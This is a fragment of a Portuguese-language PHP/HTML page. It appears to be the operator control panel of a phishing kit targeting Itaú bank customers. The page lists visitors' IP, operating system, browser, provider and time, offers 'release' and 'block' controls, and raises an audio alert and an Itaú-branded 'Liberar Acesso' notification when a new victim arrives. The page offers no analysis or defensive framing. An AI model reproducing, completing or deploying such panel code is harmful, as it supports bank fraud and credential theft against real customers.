max-width: 100px !important;
width: 80px !important;
}
#TblNews td {
max-width: 300px !important;
}
#TblNews .form-control{
height: 22px !important;
}
#modalHeader{
padding: 10px !important;
}
input[type="date"]::-webkit-inner-spin-button{
display: none;
}
input[type="datetime-local"]::-webkit-inner-spin-button{
display: none;
}
</style>
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="font-awesome/css/font-awesome.css" rel="stylesheet">
<link rel="shortcut icon" type="image/png" href="https://3.bp.blogspot.com/-LHH81gnk9n4/UWVJe3qcmvI/AAAAAAAAAS0/DRJUYGEj8wU/s1600/favicon+matrix+(2).ico"/>
<link rel="shortcut icon" type="image/png" href="https://wdcontabilidade.com.br/site/wp-content/uploads/2015/08/cropped-favicon-1.png" />
<link rel="icon" type="image/png" href="https://wdcontabilidade.com.br/site/wp-content/uploads/2015/08/cropped-favicon-1.png" />
<!-- FooTable -->
<link href="css/plugins/footable/footable.core.css" rel="stylesheet">
<link href="css/animate.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<link href="css/plugins/datapicker/datepicker3.css" rel="stylesheet">
</head>
<tb>
</tb>
<body leftmargin="1" topmargin="1" marginwidth="1" marginheight="1">
<div style="border:3px solid black;margin:1 auto; width:1200px; padding:3px;">
<table width="1000px" height="40" border="1" align="center" cellpadding="0" cellspacing="0" class="ACR" id="Table_01">
<tr>
</tr>
<tr>
<br>
<td class="paginacao"><div align="center">
[<a href="./zerar.php?s=1">ZERAR ACESSOS</a>] - [<a href="./zerar.php?a=1">ZERAR LIBERADOS</a>] - [<a href="./zerar.php?b=1">ZERAR BLOQUEADOS</a>] - [<a href="./zerar.php?t=1">ZERAR TODOS</a>]<br>
</td>
</p>
</div></td>
</tr>
</table>
</table>
<table width="1000" border="4" align="center" cellpadding="4" cellspacing="4" bordercolor="#101f10">
<tr class="paginacao">
<th class="valor">LIBERAR</th>
<td class="valor" nowrap >ITAU</td>
<td class="valor" nowrap >IP</td>
<td class="valor" nowrap >S.O</td>
<td class="valor" nowrap >NAVEGADOR</td>
<td class="valor" nowrap >PROVEDOR</td>
<td class="valor" nowrap >DATA</td>
<td class="valor" nowrap >HORA</td>
</tr>
<?php
$ponteiro = fopen($parceiro, "r");
while (!feof($ponteiro))
{
$linha = fgets($ponteiro, 4096);
echo $linha;
}
fclose($ponteiro);
?>
</table>
<tr>
</td>
</tr>
</table>
</div>
<?php
if ((int)$i > (int)$count)
{
echo "<audio autoplay='true' src='acesso.wav' ><script>spawnNotification('Liberar Acesso','https://imga.apk.tools/300/e/9/6/com.itau.png','EXTEN��O CHROME');</script>";
}
?>
More Research